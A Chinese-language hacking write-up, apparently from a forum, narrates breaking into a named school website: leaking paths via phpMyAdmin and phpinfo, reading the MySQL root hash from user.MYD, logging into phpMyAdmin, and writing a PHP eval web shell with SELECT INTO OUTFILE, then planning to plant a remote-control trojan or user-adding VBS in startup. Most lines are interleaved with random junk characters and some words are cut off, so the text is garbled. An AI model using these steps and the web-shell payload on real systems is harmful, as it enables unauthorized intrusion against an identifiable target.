3、magic_quotes_gpc()=OFF
+ E7 ]$ ^9 [9 G9 N. @( E" u9 i( r3 b% Y4 H
试着爆绝对路径:
- c# m% \% p8 J6 ?: d3 w
1./phpMyAdmin/index.php?lang[]=1
. L7 s1 D& x4 D# H7 ?5 R2 M( @& Q2./phpMyAdmin/phpinfo.php
' S9 _- B! |3 q/ K n6 I3 q3./load_file()
3 E5 K% W+ {0 f. Q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
6 B& v& D$ c# P% e5./phpmyadmin/libraries/select_lang.lib.php
4 i, M+ q5 Y, \4 H: y9 W9 j6./phpmyadmin/libraries/lect_lang.lib.php
$ g3 e. W) G5 v& h$ G
7./phpmyadmin/libraries/mcrypt.lib.php
/ \, t8 l) q4 _1 \
8./phpmyadmin/libraries/export/xls.php
h5 n( }+ j" {3 j
4 N* U. @( |. E3 c
均不行...........................
) a/ V" W/ g6 O* q' i9 k( G) g' f& n) z/ p6 U
御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
% K- D, J" i$ o8 @& Q0 R d. h! `7 q* f
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
2 T% u4 Q6 l/ K4 ?) R
! s* u" C- X' ?3 y
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
0 n4 ~+ { E6 a4 E4 j
, |: {! Y) T/ P. C$ M1 ~& Z敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
5 z4 |: f! G% y* Y Q" q! J9 f* Y9 S& N" l# a3 Q' h( R; s# n
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
! V" A+ s5 @" ]3 c4 }( x
2 u$ d5 B: I: i) c2 B, U( _ M
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
V) z% b3 h% M4 Q" [ ^- J
( R x/ y; b8 ]9 i$ e自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
: b" l' e/ X' o3 p6 w1 U1 m: h
" o [0 M2 z: ]' c成功读到root密码:
7 S3 m' Q. D1 W. D. K' h
" c2 X9 M6 W2 x! Y5 `$ z17---- r(0072)
$ N% a% f, `9 @) \/ L; _! d3 q18---- o(006f)
4 \6 |$ ~5 m& E/ `5 Q% Y7 V6 ~8 ~
19---- o(006f)
+ h5 N# ?% I" S; b+ B% r/ \20---- t(0074)
/ [! j- y+ S7 v4 J1 n4 i! g21---- *(002a)
& k% Y! e( B% X& ?7 w
22---- 8(0038)
2 y* t% h! X/ [2 s& H23---- 2(0032)
9 X, z+ V! _+ T24---- E(0045)
2 S2 L3 S; `5 F* @5 q$ p
25---- 1(0031)
Y. H0 N' L3 ?26---- C(0043)
, K; i5 n% c2 D9 Q0 O# ~
27---- 5(0035)
, W8 |+ K/ P* j0 h: J$ f- g# a28---- 8(0038)
# d" n0 k% z) v/ j" O
29---- 2(0032)
6 U/ z- h) d7 R1 [8 W- Z30---- 8(0038)
+ \+ q0 A9 L( S8 |
31---- A(0041)
5 j# { {% L" m! H% X8 ^32---- 9(0039)
) q8 f. l( P; {3 C z: u9 ]8 N33---- B(0042)
& f0 h- p$ x$ Z0 u Z) ~34---- 5(0035)
! l: y$ G( u t. A8 C: c+ ]
35---- 4(0034)
% c3 V# v. V8 M S- B) W8 x A36---- 8(0038)
! B8 a& y; A1 I- N9 A37---- 6(0036)
1 F z1 g; I. e+ ^* t" `4 \5 j
38---- 4(0034)
' V3 N' n) m; p; ~5 A! G! G
39---- 9(0039)
: o) p! P0 j/ i40---- 1(0031)
, J% r& I" O! Y- v0 M. ~' P4 c41---- 1(0031)
8 g Z, V, i* Y- ~! h
42---- 5(0035)
, \. u N' h/ n" C W- |
43---- 3(0033)
0 c/ R/ M: S* `4 q! B44---- 5(0035)
# Q' P, m0 u3 ?. X& W" \
45---- 9(0039)
$ W. P* Y+ v; }" r46---- 8(0038)
, q9 x$ _6 r: a, \: J
47---- F(0046)
2 L- N1 w4 y" B4 `- H1 k1 T
48---- F(0046)
3 v( r# N: S9 H( e" A49---- 4(0034)
) D) [6 d" s( u; K
50---- F(0046)
6 v8 H# n. T( G+ N% W/ p" y. d51---- 0(0030)
! S, | t+ H6 v) A* V+ }7 T52---- 3(0033)
5 S+ r/ ~. b8 U5 N5 l' R8 Q% `
53---- 2(0032)
) `/ H" x* y: C" j+ R
54---- A(0041)
/ F4 N4 |" s$ Q6 P/ F8 v) T, T! {& x
55---- 4(0034)
/ m t* O* { Y3 z: u
56---- A(0041)
$ }6 R* ]& g& F8 U: P: d
57---- B(0042)
% M3 x9 a3 D( |' f+ v58---- *(0044)
! J! f0 u) r) d7 ^$ N
59---- *(0035)
% S4 ^- Y) d j: x
60---- *(0041)
0 E9 O6 N) Y; h' Y [8 l& z
61---- *0032)
' u8 ^, S' A% u* \/ }5 I3 E; _( i. _: j: g, M4 b- N' J- u: J9 r3 H
解密后成功登陆phpmyamin
) n1 t7 [" K }2 d. F2 z
1 n' _: D0 {- t& F& K7 U
# F) j! o" e( ]( j [attach]164[/attach]
6 d3 g+ w% Z0 M3 g" E" l" l
1 y5 |" @0 N9 F; o
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
. q- ?: g) W+ y( `: j# g
% Y$ z6 m. F; g* O. Q成功执行,拿下shell,菜刀连接:
/ b- S, |0 H p$ ?
' X" L- ` L+ |: @+ D5 a& }. \( x服务器不支持asp,aspx,php提权无果...................
* _; i) w0 f0 t( C+ F, w9 _
7 `: n: F( k# b# d$ [但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
! K5 ]" F6 F0 M- f2 j2 a